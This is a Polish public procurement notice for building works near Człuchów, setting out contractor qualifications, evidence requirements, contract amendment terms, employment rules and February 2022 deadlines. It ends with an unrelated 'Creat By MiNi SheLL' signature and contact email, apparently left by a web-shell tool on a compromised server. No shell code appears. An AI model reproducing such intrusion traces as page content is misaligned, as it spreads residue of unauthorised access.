uprawnienia budowlane określone przepisami<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 poz. 1333 ze zm.), dalej<br/>nazywanej „ustawa Prawo budowlane”, niezbędnych do wykonania zamówienia tj. dysponuje lub<br/>będzie dysponował na etapie realizacji umowy w sprawie niniejszego zamówienia publicznego<br/>następującymi osobami zdolnymi do wykonania zamówienia:<br/>a) jedną osobą, która obejmie funkcję kierownika budowy branży konstrukcyjno-budowlanej,<br/>posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w<br/>specjalności konstrukcyjno-budowlanej wydane na podstawie ustawy Prawo budowlane (lub<br/>odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów prawa polskiego lub odpowiednie uprawnienia przysługujące na<br/>podstawie odrębnych przepisów prawa polskiego i wspólnotowego - w szczególności<br/>kwalifikacje zawodowe uznane na podstawie art. 12a ustawy Prawo budowlane lub prawo do<br/>tymczasowego i okazjonalnego wykonywania zawodu, o którym mowa w art. 20a ustawy z dnia<br/>15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz. U. z 2019 r. poz. 1117 ze zm.) w zakresie niezbędnym do wykonania<br/>przedmiotu zamówienia), która posiada doświadczenie zawodowe nabyte przy pełnieniu funkcji<br/>kierownika budowy branży konstrukcyjno-budowlanej lub inspektora nadzoru branży<br/>konstrukcyjno-budowlanej przy realizacji co najmniej 2 (dwóch) robót budowlanych.<br/>b) instalatora instalacji elektrycznych posiadającego aktualne uprawnienia SEP G1 w zakresie<br/>instalacji, dozoru, eksploatacji i pomiarów.<br/>Ocena wykazania spełnienia warunku określonego powyżej w ust. 2 pkt 2) nastąpi na podstawie<br/>przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdz. X ust. 2 pkt 1 lit. b)<br/>SWZ (wzór wykazu osób skierowanych przez wykonawcę do realizacji zamówienia publicznego<br/>stanowi załącznik nr 6 do SWZ).<br/>Zamawiający dopuszcza by jedna (ta sama) osoba łączyła w sobie kompetencje wymagane w<br/>pkt 2) lit. a) i b). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia. Tym samym, zamawiający dokona weryfikacji wyłącznie na podstawie oświadczenia wstępnego, o którym mowa w Rozdziale IX. ust. 1 pkt 1 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający żąda podmiotowych środków dowodowych na potwierdzenie<br/>spełnienia warunków udziału w postępowaniu, tym samym:<br/>1) Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych<br/>środków dowodowych:<br/>a) wykaz robót budowlanych (według wzoru stanowiącego załącznik nr 5 do SWZ) - na potwierdzenie<br/>spełnienia warunku udziału w postępowaniu określonego w rozdz. VIII ust. 2 pkt 1) SWZ) –<br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających,<br/>czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są:<br/>− referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane,<br/>− a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów -<br/>inne odpowiednie dokumenty.<br/>Wskazany 5-letni okres, o którym mowa powyżej należy liczyć wstecz od dnia, w którym upływa<br/>(upłynął) termin składania ofert w niniejszym postępowaniu.<br/>UWAGA:<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz o którym mowa w ust. 1 pkt 1 lit a), dotyczy tylko tych robót<br/>budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>b) wykaz osób (według wzoru stanowiącego załącznik nr 6 do SWZ), skierowanych przez wykonawcę<br/>do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami (na potwierdzenie spełnienia warunku udziału w postępowaniu określonego w rozdz. VIII ust.<br/>2 pkt 2) SWZ).<br/>2) Jeżeli zachodzą uzasadnione podstawy do uznania, że uprzednio złożone podmiotowe środki<br/>dowodowe nie są już aktualne, zamawiający może w każdym czasie wezwać wykonawcę lub<br/>wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych<br/>na dzień ich złożenia.<br/>3) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne, o ile wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych środków</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przez wykonawcę przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia zamawiający<br/>zbada, czy nie zachodzą podstawy wykluczenia wobec każdego z tych wykonawców.<br/>Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu w zakresie<br/>wskazanym w rozdziale VII. ust. 2 SWZ oraz spełnianiu warunków udziału<br/>w postępowaniu w zakresie wskazanym w rozdziale VIII. ust. 2 SWZ. Oświadczenie to stanowi<br/>dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki<br/>dowodowe, wskazane w rozdziale X. SWZ.<br/>Oświadczenie składają odrębnie:<br/>-każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu;<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie<br/>zamówienia publicznego należy załączyć do oferty.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden<br/>spełnia warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana istotnych postanowień umowy może nastąpić za zgodą obydwu stron wyrażoną na<br/>piśmie,w formie aneksu do umowy z zachowaniem formy pisemnej pod rygorem nieważności<br/>takiej zmiany.<br/>Zmawiający działając w oparciu o art.455ust.1pkt 2-4 i ust.2 ustawy Pzp przewiduje zgodnie z<br/>art. 455ust.1pkt1 zmiany umowy w następującym zakresie:<br/>1)konieczność przesunięcia terminu realizacji umowy lub innych terminów umownych,jeżeli ich<br/>przesunięcie jest wynikiem okoliczności leżących po stronie Zam.,w szczególności stanowi<br/>następstwo:a)nieterminowego przekazania terenu budowy,b)braku przygotowania lub braku<br/>możliwości przekazania miejsca realizacji umowy z uwagi na istotne czynniki uniemożliwiające<br/>podjęcie robót bud.,w zakresie,w jakim w/w okoliczności mają lub będą mogły mieć wpływ na<br/>dotrzymanie terminów umownych<br/>2)konieczność przesunięcia terminu realizacji umowy lub innych terminów umownych, jeżeli ich<br/>przesunięcie jest wynikiem wykonania robót zamiennych lub innych prac niezbędnych do<br/>wykonania przedmiotu umowy ze względu na zasady wiedzy tech., w tym udzielenia zamówień<br/>dodatkowych,które wstrzymują lub opóźniają realizację przedmiotu umowy tudzież wystąpienia<br/>niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi inwestycjami czy<br/>robotami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji<br/>3)konieczność przesunięcia terminu realizacji umowy lub innych terminów umownych będącego<br/>wynikiem powstania szkód, nieszczęśliwych wypadków dot. pracowników i osób trzecich,a<br/>powstałych w związku z wszelkimi prowadzonymi pracami i robotami będącymi przedmiotem<br/>umowy<br/>4)konieczności przesunięcia terminu realizacji umowy lub innych terminów umownych, która jest<br/>wynikiem wystąpienia siły wyższej, mającej bezpośredni wpływ na terminowość wykonania<br/>wszelkich prac i robót będących przedmiotem umowy(np. klęski żywiołowej,wystąpienia<br/>pandemii-w tym obostrzenia z nią związane,jak również znaczny wzrost zachorowalności,czy<br/>brak lub wydłużenie terminu dostaw)<br/>5)konieczność przesunięcia terminów umownych,jeśli owa konieczność powstała na skutek<br/>okoliczności,których przy dołożeniu należytej staranności nie można było przewidzieć w chwili<br/>zawarcia umowy<br/>6)konieczność wprowadzenia robót zamiennych w rozumieniu i na zasadach określonych w §17<br/>7)odstąpienie przez Zam. od wykonania części robót zbędnych do wykonania przedmiotu<br/>umowy zgodnie ze sztuką budowlaną i wiedzą tech.w ramach tzw.robót zaniechanych,o których<br/>mowa w art.§17 umowy,co skutkować może obniżeniem wynagrodzenia należnego Wykonawcy<br/>z zastrzeżeniem postanowień §14 ust. 9 umowy<br/>8)zmiany lub rezygnacji z podwykonawców,na zasoby których Wykonawca powołał się na<br/>zasadach określonych w art. 118 ust. 1 – Pzp w celu spełnienia warunków udziału w postęp.,z<br/>zastrzeżeniem,że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w<br/>stopniu nie mniejszym niż podwykonawca,na którego zasoby Wykonawca powoływał się w<br/>trakcie postępowania o udzielenie zam.,zmiany zakresu robót powierzonych w/w<br/>podwykonawcom<br/>9)zmiany umowy o dofinansowanie lub zmiany powszechnie obowiązujących przepisów prawa w<br/>zakresie mającym wpływ na realizację umowy,w tym m.in. zamiany stawek podatkowych,<br/>zmiany minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej<br/>10)przedłużenia okresu gwarancji,w sytuacji jej przedłużenia przez producenta lub Wykonawcę<br/>11)zmiany cen w sytuacji,kiedy zmiana ta będzie korzystna dla Zam. tzn.na cenę niższą (upusty,<br/>rabaty przy zachowaniu dotychczasowego zakresu świadczenia)–na pisemny wniosek jednej ze<br/>Stron<br/>12)zaistnienia możliwości wprowadzenia lepszych rozwiązań technologicznych lub lepszych<br/>materiałów pod warunkiem zatwierdzenia tych zmian przez Zam. i inspektora nadzoru<br/>inwestorskiego jeśli nowe rozwiązania są korzystne dla Zam.;wykonanie dostaw zamiennych nie<br/>może wpływać na zwiększenie wysokości cen jedn.,ani na zwiększenie wysokości<br/>wynagrodzenia ryczałtowego,o którym mowa w § 7 ust.2 umowy,przy czym może ono ulec<br/>zmniejszeniu<br/>C.D w Sekcji IX <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pomorskie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-15 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy z Sekcji VII pkt 7.4<br/>13)zmiany wymagań technicznych lub parametrów charakterystycznych dla danego elementu<br/>składowego wyposażenia z zastrzeżeniem, że zmieniony element będzie posiadał co najmniej<br/>takie lub lepsze parametry techniczne jak element zastępowany, z tym zastrzeżeniem, że nie<br/>może wpływać na zwiększenie wysokości cen jednostkowych, ani na zwiększenie wysokości<br/>wynagrodzenia ryczałtowego, o którym mowa w § 7 ust.2 umowy, przy czym może ono ulec<br/>zmniejszeniu;<br/>14)wystąpienia okoliczności których strony umowy nie były w stanie przewidzieć, pomimo<br/>zachowania należytej staranności.<br/>15)Konieczności zmian będących następstwem działania organów nadzorczo-kontrolnych.<br/>Wymagania dotyczące zatrudnienia osób wykonujących czynności związane z realizacją<br/>zamówienia:<br/>1)Na podstawie 95 ust. 1 ustawy Pzp, Zamawiający wymaga zatrudnienia przez Wykonawcę lub<br/>podwykonawcę na podstawie umowy o pracę w rozumieniu ustawy z dnia 26 czerwca 1974 r.<br/>Kodeks Pracy osób wykonujących roboty budowlane pod nadzorem kierownika budowy, o ile<br/>mieszczą się one w zakresie art. 22 §1 Kodeksu Pracy, który brzmi: „Przez nawiązanie stosunku<br/>pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz<br/>pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę,<br/>a pracodawca – do zatrudniania pracownika za wynagrodzeniem”. Za roboty budowlane<br/>wykonywane pod nadzorem kierownika budowy rozumie się wszelkie roboty ogólnobudowlane,<br/>o których mowa w przedmiocie zamówienia tj. dotyczące architektury (w tym pochylni, ścian<br/>nośnych i działowych, podłóg i posadzek, stolarki okiennej i parapetów, sufitów, drzwi<br/>wewnętrznych itp.) oraz wykonania robót dotyczących konstrukcji, wykonywane bezpośrednio<br/>przez pracowników pozostających pod nadzorem kierownika budowy.<br/>2)Jeżeli czynności wskazane w pkt 1 spełniające przesłanki art. 22 § 1 Kodeksu Pracy<br/>Wykonawca będzie Wykonywał samodzielnie (jako właściciel/współwłaściciel) Zamawiający<br/>uzna to za spełnienie warunku zatrudnienia na umowę o pracę osób wykonujących czynności<br/>związane z realizacją zamówienia.<br/>3)Wykonawca w umowie oświadczy, iż osoba lub osoby, wykonujące wszelkie roboty<br/>ogólnobudowlane zgodnie z opisem przedmiotu zamówienia wykonywane bezpośrednio przez<br/>pracowników pozostających pod nadzorem kierownika budowy w trakcie realizacji zamówienia,<br/>o których mowa w ust. 25 pkt 1 są lub będą zatrudnione na podstawie umowy o pracę w<br/>rozumieniu ustawy Kodeks Pracy.<br/>4)Zamawiający będzie uprawniony do kontroli spełniania przez Wykonawcę wymagań dotyczących zatrudnienia osoby/osób, którym zostanie powierzona realizacja Przedmiotu<br/>umowy, o których mowa w pkt 1.<br/>5)Zamawiający informuje, iż w razie jakichkolwiek wątpliwości odnośnie zatrudnienia przez<br/>Wykonawcę lub podwykonawcę osób wykonujących czynności na podstawie umowy o pracę,<br/>uprawniony jest do powiadomienia właściwego inspektoratu pracy i zwrócenia się o<br/>przeprowadzenie przez niego kontroli.<br/>6)Zatrudnienie osób, o których mowa w pkt 1 powinno trwać nieprzerwanie przez cały okres<br/>realizacji danej czynności.<br/>7)Uprawnienia Zamawiającego w zakresie sankcji z tytułu niespełnienia wymagań określonych w<br/>ust. pkt 1, zostały uregulowane w projekcie umowy, stanowiącym zał. nr 1 do SWZ.<br/>Zamawiający przewiduje również możliwość złożenia oferty po odbyciu przez wykonawców wizji<br/>lokalnej, która przeprowadzona zostanie w: Barkowo 44/3, 77-300 Człuchów w dniu 7 lutego 2022 r. godz. 10:30 Udział Wykonawców w wizji lokalnej nie jest obowiązkowy.<br/>Zamawiający wykluczy z postępowania o udzielenie zamówienia, na podstawie okoliczności<br/>wskazanych w art. 108 ust.1 ustawy Pzp.<br/>Dokumenty składne wraz z ofertą zostały wskazane w rozdziale IX SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com